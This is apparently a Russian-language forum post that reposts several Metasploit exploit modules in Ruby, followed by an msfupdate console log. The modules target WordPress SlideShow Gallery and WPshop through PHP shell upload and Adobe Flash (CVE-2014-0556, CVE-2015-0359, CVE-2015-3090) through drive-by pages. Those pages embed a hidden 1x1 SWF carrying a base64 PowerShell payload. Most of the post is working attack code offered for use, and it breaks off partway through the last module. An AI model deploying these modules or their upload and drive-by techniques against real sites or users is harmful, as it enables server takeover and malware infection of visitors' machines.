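          [ 'Automatic', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Sep 23 2014',
      'DefaultTarget' => 0))
  end

  # Loads the prebuilt SWF once, then hands control to the server mixin.
  def exploit
    @swf = create_swf
    super
  end

  # Serves the SWF for *.swf requests and the loader HTML for everything else;
  # both replies carry no-cache headers.
  #
  # @param cli [Rex::Socket]
  # @param request [Rex::Proto::Http::Request]
  # @param target_info [Hash] browser fingerprint gathered by the mixin
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Builds the page that embeds the SWF as a 1x1 object. The PowerShell command
  # generated from the target payload travels base64-encoded in the "sh"
  # FlashVar — what a proxy or endpoint sensor would see on the wire.
  #
  # @return [Array(String, Binding)] ERB template and the binding to render it with
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|

    return html_template, binding()
  end

  # Reads the prebuilt SWF shipped in the framework data directory. binread
  # replaces the open/read block that assigned the same local twice.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
    ::File.binread(path)
  end

end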
 
WordPress SlideShow Gallery Authenticated File Upload

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

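class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  # Module metadata and the credential options; the upload endpoint is
  # authenticated, so a valid WordPress account is required.
  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'Wordpress SlideShow Gallery Authenticated File Upload',
      'Description' => %q{
The Wordpress SlideShow Gallery plugin contains an authenticated file upload
vulnerability. We can upload arbitrary files to the upload folder, because
the plugin also uses it's own file upload mechanism instead of the wordpress
api it's possible to upload any file type.
},
      'Author' =>
        [
          'Jesus Ramirez Pichardo', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2014-5460'],
          ['EDB', '34681'],
          ['WPVDB', '7532']
        ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [['WP SlideShow Gallery 1.4.6', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Aug 28 2014'))

    register_options(
      [
        OptString.new('WP_USER', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class)
  end

  # @return [String] WP_USER option
  def user
    datastore['WP_USER']
  end

  # @return [String] WP_PASSWORD option
  def password
    datastore['WP_PASSWORD']
  end

  # Version check against the plugin readme; 1.4.7 is the first fixed version.
  def check
    check_plugin_version_from_readme('slideshow-gallery', '1.4.7')
  end

  # Logs in, submits the plugin's own slide-save form with the PHP payload as
  # the image file (the plugin bypasses the WordPress upload API, which is why
  # a .php name is accepted), then requests the dropped file.
  def exploit
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end

    print_status("#{peer} - Trying to upload payload")
    # One random name, used for the upload, the cleanup registration and the
    # final request so all three refer to the same file.
    filename = "#{rand_text_alpha_lower(8)}.php"

    data = Rex::MIME::Message.new
    data.add_part("", nil, nil, 'form-data; name="Slide[id]"')
    data.add_part("", nil, nil, 'form-data; name="Slide[link]"')
    data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"')
    data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"')
    data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"')
    data.add_part('file', nil, nil, 'form-data; name="Slide[type]"')
    data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"')
    data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"')
    data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"')
    data.add_part("", nil, nil, 'form-data; name="Slide[order]"')
    data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"')
    # The listing had the literal "#(unknown)" here and in the status line
    # below where the filename variable belongs; restored to the interpolation.
    data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"")
    post_data = data.to_s

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => {
        'page' => 'slideshow-slides',
        'method' => 'save'
      },
      'data' => post_data,
      'cookie' => cookie
    })

    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename)
    )
  end
end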
 
WordPress WPshop eCommerce 1.3.9.5 Shell Upload

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

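class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  # Module metadata. The upload request below carries no session cookie, so
  # the affected ajax endpoint accepts files without a WordPress login.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
      'Description' => %q{
This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
code execution. This module has been tested successfully on WordPress WPshop eCommerce
1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
},
      'Author' =>
        [
          'g0blin', # Vulnerability Discovery, initial msf module
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['WPVDB', '7830'],
          ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
        ],
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget' => 0)
    )
  end

  # Version check against the plugin readme: vulnerable from 1.3.3.3 up to,
  # but not including, 1.3.9.6.
  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  end

  # Uploads the PHP payload through the plugin's ajaxUpload element, registers
  # it for cleanup, then requests it from the uploads directory.
  def exploit
    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    if res
      # Substring test instead of an interpolated Regexp: the '.' in the name
      # was unescaped there and matched any character.
      if res.code == 200 && res.body.to_s.include?(php_page_name)
        print_good("#{peer} - Payload uploaded as #{php_page_name}")
        register_files_for_cleanup(php_page_name)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end

    print_status("#{peer} - Calling payload...")
    # Second argument is the read timeout in seconds; the payload may not reply.
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
      5
    )
  end
end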
 
Adobe Flash Player domainMemory ByteArray Use After Free

Description:
  This module exploits a use-after-free vulnerability in Adobe Flash
  Player. The vulnerability occurs when the ByteArray assigned to the
  current ApplicationDomain is freed from an ActionScript worker, when
  forcing a reallocation by copying more contents than the original
  capacity, but Flash forgets to update the domainMemory pointer,
  leading to a use-after-free situation when the main worker
  references the domainMemory again. This module has been tested
  successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash
  17.0.0.134
.

References:
  http://cvedetails.com/cve/2015-0359/
  https://helpx.adobe.com/security/products/f.../apsb15-06.html
  https://www.fireeye.com/blog/threat-researc...exploiting.html
  http://malware.dontneedcoffee.com/2015/04/...700134-and.html
  https://git.hacklab.kr/snippets/13
  http://pastebin.com/Wj3NViUu

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

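class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. BrowserRequirements gates delivery to 32-bit IE on
  # Windows 7 running a 17.x Flash build no newer than 17.0.0.134, the
  # version the description reports as tested.
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player domainMemory ByteArray Use After Free',
      'Description'         => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, when forcing a reallocation by copying more
        contents than the original capacity, but Flash forgets to update the domainMemory
        pointer, leading to a use-after-free situation when the main worker references the
        domainMemory again. This module has been tested successfully on Windows 7 SP1
        (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'bilou', # Vulnerability discovery according to Flash Advisory
          'Unknown', # Exploit in the wild
          'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0359'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
          ['URL', 'https://git.hacklab.kr/snippets/13'],
          ['URL', 'http://pastebin.com/Wj3NViUu']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          # \A instead of ^ so the major-version check applies to the whole
          # reported version string rather than to any one line of it.
          :flash   => lambda { |ver| ver =~ /\A17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      # The CVE id, the APSB15-06 bulletin and the April 2015 write-ups listed
      # above all date this issue to 2015; the previous value ('Apr 14 2014')
      # was off by a year.
      'DisclosureDate'      => 'Apr 14 2015',
      'DefaultTarget'       => 0))
  end

  # Load the precompiled SWF once, then hand control to the browser exploit
  # server loop provided by the mixin.
  def exploit
    @swf = create_swf
    super
  end

  # Serve one request from a fingerprinted client: the SWF when the URI ends
  # in ".swf", the loader HTML page otherwise.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param request [Rex::Proto::Http::Request] the HTTP request
  # @param target_info [Hash] browser fingerprint collected by the server
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # \z (not $) so a trailing ".swf" is matched only at the very end of the URI.
    if request.uri =~ /\.swf\z/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Render the loader page. The payload is wrapped in a PowerShell command
  # (comspec removed) and handed to the SWF base64-encoded via the "sh" FlashVar.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param target_info [Hash] browser fingerprint used to pick the payload
  # @return [Array(String, Binding)] ERB template and the binding to evaluate it in
  def exploit_template(cli, target_info)
    # Random SWF name so the second request is distinguishable and not cached.
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Read the precompiled exploit SWF from the framework data directory.
  # A missing data file raises Errno::ENOENT at exploit start, which is
  # preferable to silently serving an empty body.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
    ::File.binread(path)
  end

end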

Рекомендую всем, кто использует данный продукт, перейти на обновление через Git (msfupdate поверх git-клона репозитория); результат ниже. Обратите внимание: в выводе remote подключён по git://github.com/... — этот протокол не шифрует трафик и не проверяет подлинность сервера, поэтому для получения кода безопаснее переключить remote на https://.
123@123-VirtualBox:~$ sudo msfupdate
sudo: unable to resolve host 123-VirtualBox
[sudo] password for 123:
Sorry, try again.
[sudo] password for 123:
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via git
[*] Note: Updating from bleeding edge
HEAD is now at 67a23f2 Land #5296, info hash product name fix
Already on 'master'
Your branch is ahead of 'origin/master' by 3113 commits.
  (use "git push" to publish your local commits)
remote: Counting objects: 3133, done.
remote: Compressing objects: 100% (342/342), done.
remote: Total 3133 (delta 658), reused 455 (delta 454), pack-reused 2337
Receiving objects: 100% (3133/3133), 6.36 MiB | 2.37 MiB/s, done.
Resolving deltas: 100% (2325/2325), done.
From git://github.com/rapid7/metasploit-framework
+ cb642f9...02bc8eb gh-pages   -> upstream/gh-pages  (forced update)
   67a23f2..5085749  master     -> upstream/master
   4c9f44b..013781f  release    -> upstream/release
   0b608e1..e95c908  staging/rails-4.0 -> upstream/staging/rails-4.0
* [new tag]         2015050601 -> 2015050601
* [new tag]         blog-20150506 -> blog-20150506
Updating 67a23f2..5085749
Fast-forward
.gitignore                                                                |   4 +-
Gemfile.lock                                                              |   4 +-
data/exploits/CVE-2015-0336/msf.swf                                       | Bin 0 -> 18060 bytes
data/exploits/CVE-2015-0336/trigger.swf                                   | Bin 0 -> 340 bytes
data/exploits/CVE-2015-0359/msf.swf                                       | Bin 0 -> 18109 bytes
data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class      | Bin 3130 -> 0 bytes
data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class   | Bin 559 -> 0 bytes
data/java/javapayload/stage/Meterpreter.class                             | Bin 2004 -> 0 bytes
data/java/javapayload/stage/Shell.class                                   | Bin 1235 -> 0 bytes
data/java/javapayload/stage/Stage.class                                   | Bin 211 -> 0 bytes
data/java/javapayload/stage/StreamForwarder.class                         | Bin 1514 -> 0 bytes
data/java/metasploit/AESEncryption.class                                  | Bin 1462 -> 0 bytes                                
data/java/metasploit/JMXPayload.class                                     | Bin 345 -> 0 bytes                                 
data/java/metasploit/JMXPayloadMBean.class                                | Bin 163 -> 0 bytes                                 
data/java/metasploit/Payload.class                                        | Bin 9415 -> 0 bytes                                
data/java/metasploit/PayloadServlet.class                                 | Bin 803 -> 0 bytes
data/java/metasploit/PayloadTrustManager.class                            | Bin 1309 -> 0 bytes
data/java/metasploit/RMILoader.class                                      | Bin 1731 -> 0 bytes
data/java/metasploit/RMIPayload.class                                     | Bin 498 -> 0 bytes
data/meterpreter/ext_server_android.jar                                   | Bin 38782 -> 0 bytes
data/meterpreter/ext_server_networkpug.lso                                | Bin 36132 -> 0 bytes
data/meterpreter/ext_server_sniffer.lso                                   | Bin 43612 -> 0 bytes
data/meterpreter/ext_server_stdapi.jar                                    | Bin 39662 -> 0 bytes
data/meterpreter/ext_server_stdapi.lso                                    | Bin 208412 -> 0 bytes
data/meterpreter/meterpreter.jar                                          | Bin 24752 -> 0 bytes
data/meterpreter/msflinker_linux_x86.bin                                  | Bin 1490944 -> 0 bytes
external/source/exploits/CVE-2015-0336/Msf.as                             | 318 +++++++++++++++++++++++++++++++++++++++++++++++
external/source/exploits/CVE-2015-0336/Trigger/Trigger.as2proj            |  60 +++++++++
external/source/exploits/CVE-2015-0336/Trigger/src/Main.as                |  18 +++
external/source/exploits/CVE-2015-0359/Msf.as                             | 261 ++++++++++++++++++++++++++++++++++++++
lib/metasploit/framework/login_scanner/snmp.rb                            |   9 +-
lib/metasploit/framework/login_scanner/telnet.rb                          |  20 ++-
lib/msf/base/serializer/readable_text.rb                                  |  65 ++++++++--
lib/msf/base/sessions/meterpreter.rb                                      |  22 +++-
lib/msf/base/sessions/meterpreter_options.rb                              |  68 +++++-----
lib/msf/core/auxiliary/login.rb                                           |   2 +-
lib/msf/core/exploit/smb/server/share.rb                                  |  12 ++
lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb           |  19 ++-
lib/msf/core/exploit/smb/server/share/command/read_andx.rb                |   4 +-
lib/msf/core/exploit/smb/server/share/information_level/find.rb           |   8 +-
lib/msf/core/exploit/smb/server/share/information_level/query.rb          |  11 +-
lib/msf/core/handler/bind_tcp.rb                                          |  11 +-
lib/msf/core/handler/reverse_hop_http.rb                                  |   4 +-
lib/msf/core/handler/reverse_http.rb                                      |  41 +++---
lib/msf/core/handler/reverse_http/stageless.rb                            |   2 +
lib/msf/core/handler/reverse_tcp.rb                                       |  13 +-
lib/msf/core/payload/java.rb                                              |  12 +-
lib/msf/core/payload/linux/bind_tcp.rb                                    | 179 ++++++++++++++++++++++++++
lib/msf/core/payload/windows/bind_tcp.rb                                  | 263 +++++++++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/exitfunk.rb                                  |   2 +-
lib/msf/core/payload/windows/reflectivedllinject.rb                       |  22 ++--
lib/msf/core/payload/windows/reverse_tcp.rb                               | 242 ++++++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/stageless_meterpreter.rb                     |  14 ++-
lib/msf/core/payload/windows/x64/bind_tcp.rb                              | 220 ++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/x64/block_api.rb                             | 117 +++++++++++++++++
lib/msf/core/payload/windows/x64/exitfunk.rb                              |  84 +++++++++++++
lib/msf/core/payload/windows/x64/reflectivedllinject.rb                   |  25 ++--
lib/msf/core/payload/windows/x64/reverse_tcp.rb                           | 192 ++++++++++++++++++++++++++++
lib/msf/core/payload/windows/x64/stageless_meterpreter.rb                 |  14 ++-
lib/msf/core/rpc/v10/rpc_db.rb                                            | 223 +++++++++++++--------------------
lib/msf/core/session.rb                                                   |   4 +
lib/msf/http/wordpress/version.rb                                         |  26 +++-
lib/msf/util/exe.rb                                                       |   2 +-
lib/nessus/nessus-xmlrpc.rb                                               |   7 +-
lib/rex/payloads/meterpreter/patch.rb                                     |  67 +++++-----
lib/rex/post/meterpreter.rb                                               |   2 +-
lib/rex/post/meterpreter/client.rb                                        |  27 +++-
lib/rex/post/meterpreter/client_core.rb                                   | 120 ++++++++++++------
lib/rex/post/meterpreter/extensions/priv/priv.rb                          |   2 +-
lib/rex/post/meterpreter/extensions/stdapi/ui.rb                          |   4 +-
lib/rex/post/meterpreter/packet.rb                                        |   9 +-
lib/rex/post/meterpreter/packet_dispatcher.rb                             |  11 +-
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb            |  89 +++++++++++--
lib/sqlmap/sqlmap_manager.rb                                              |  30 +++--
lib/sqlmap/sqlmap_session.rb                                              |  23 ++--
metasploit-framework.gemspec                                              |   2 +-
modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb                       |  10 +-
modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb             |   2 +-
modules/auxiliary/gather/java_rmi_registry.rb                             |   2 +-
modules/auxiliary/gather/ssllabs_scan.rb                                  |   3 +-
modules/auxiliary/scanner/http/goahead_traversal.rb                       |   7 +-
modules/auxiliary/scanner/http/owa_iis_internal_ip.rb                     |   3 +-
modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb              |   2 +-
modules/auxiliary/scanner/telnet/brocade_enable_login.rb                  | 154 +++++++++++++++++++++++
modules/exploits/linux/http/multi_ncc_ping_exec.rb                        |   2 +-
modules/exploits/multi/http/axis2_deployer.rb                             |   5 +-
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb       |   3 +-
modules/exploits/multi/misc/java_jmx_server.rb                            |   2 +-
modules/exploits/multi/misc/java_rmi_server.rb                            |   2 +-
modules/exploits/unix/webapp/wp_revslider_upload_execute.rb               |  96 ++++++++++++++
modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb                |   6 +-
modules/exploits/windows/antivirus/ams_hndlrsvc.rb                        |   3 +-
modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb       |   1 +
modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb |   5 +-
modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb         | 112 +++++++++++++++++
modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb  | 118 ++++++++++++++++++
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb        |   3 +-
modules/exploits/windows/http/osb_uname_jlist.rb                          |   3 +-
modules/exploits/windows/local/run_as.rb                                  |   2 +-
modules/exploits/windows/smb/group_policy_startup.rb                      |  86 +++++++++++++
modules/payloads/singles/java/shell_reverse_tcp.rb                        |   4 +-
modules/payloads/stagers/linux/x86/bind_tcp.rb                            |  78 ++----------
modules/payloads/stagers/windows/bind_tcp.rb                              |  37 ++----
modules/payloads/stagers/windows/reverse_tcp.rb                           |  38 +-----
modules/payloads/stagers/windows/x64/bind_tcp.rb                          |  48 +------
modules/payloads/stagers/windows/x64/reverse_tcp.rb                       |  46 +------
modules/payloads/stages/java/meterpreter.rb                               |   3 +-
modules/payloads/stages/linux/x86/meterpreter.rb                          |  16 ++-
modules/payloads/stages/windows/meterpreter.rb                            |  10 +-
modules/payloads/stages/windows/patchupmeterpreter.rb                     |   2 +-
modules/payloads/stages/windows/x64/meterpreter.rb                        |  15 +--
msfrpcd                                                                   |  10 +-
plugins/msgrpc.rb                                                         |   4 +-
plugins/nessus.rb                                                         |  57 +++------
plugins/sqlmap.rb                                                         |  53 ++++----
scripts/meterpreter/metsvc.rb                                             |   2 +-
spec/lib/metasploit/framework/login_scanner/snmp_spec.rb                  |   2 -
spec/lib/msf/http/wordpress/version_spec.rb                               |  88 +++++++++++++
spec/lib/rex/post/meterpreter_spec.rb                                     |   4 +-
spec/modules/payloads_spec.rb                                             |  30 ++---
20 files changed, 3477 insertions(+), 712 deletions(-)
create mode 100755 data/exploits/CVE-2015-0336/msf.swf
create mode 100755 data/exploits/CVE-2015-0336/trigger.swf
create mode 100755 data/exploits/CVE-2015-0359/msf.swf
delete mode 100755 data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class
delete mode 100755 data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class
delete mode 100755 data/java/javapayload/stage/Meterpreter.class
delete mode 100755 data/java/javapayload/stage/Shell.class
delete mode 100755 data/java/javapayload/stage/Stage.class
delete mode 100755 data/java/javapayload/stage/StreamForwarder.class
delete mode 100755 data/java/metasploit/AESEncryption.class
delete mode 100644 data/java/metasploit/JMXPayload.class
delete mode 100644 data/java/metasploit/JMXPayloadMBean.class
delete mode 100755 data/java/metasploit/Payload.class
delete mode 100755 data/java/metasploit/PayloadServlet.class
delete mode 100755 data/java/metasploit/PayloadTrustManager.class
delete mode 100755 data/java/metasploit/RMILoader.class
delete mode 100755 data/java/metasploit/RMIPayload.class
delete mode 100644 data/meterpreter/ext_server_android.jar
delete mode 100755 data/meterpreter/ext_server_networkpug.lso
delete mode 100755 data/meterpreter/ext_server_sniffer.lso
delete mode 100644 data/meterpreter/ext_server_stdapi.jar
delete mode 100755 data/meterpreter/ext_server_stdapi.lso
delete mode 100644 data/meterpreter/meterpreter.jar
delete mode 100644 data/meterpreter/msflinker_linux_x86.bin
create mode 100755 external/source/exploits/CVE-2015-0336/Msf.as
create mode 100755 external/source/exploits/CVE-2015-0336/Trigger/Trigger.as2proj
create mode 100755 external/source/exploits/CVE-2015-0336/Trigger/src/Main.as
create mode 100755 external/source/exploits/CVE-2015-0359/Msf.as
create mode 100644 lib/msf/core/payload/linux/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/reverse_tcp.rb
create mode 100644 lib/msf/core/payload/windows/x64/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/x64/block_api.rb
create mode 100644 lib/msf/core/payload/windows/x64/exitfunk.rb
create mode 100644 lib/msf/core/payload/windows/x64/reverse_tcp.rb
create mode 100644 modules/auxiliary/scanner/telnet/brocade_enable_login.rb
create mode 100644 modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
create mode 100644 modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
create mode 100644 modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
create mode 100644 modules/exploits/windows/smb/group_policy_startup.rb
 
Adobe Flash Player ShaderJob Buffer Overflow

This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

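class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. The :ua_name and :flash requirement lambdas consult the
  # selected target, so the Windows and Linux gates are evaluated independently;
  # the version upper bounds match the builds the description reports as tested.
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
        Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
        same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
        of the ShaderJob after starting the job it's possible to create a buffer overflow condition
        where the size of the destination buffer and the length of the copy are controlled. This
        module has been tested successfully on:
        * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3090'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
          ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          # \A instead of ^ so the major-version check applies to the whole
          # reported version string rather than to any one line of it.
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
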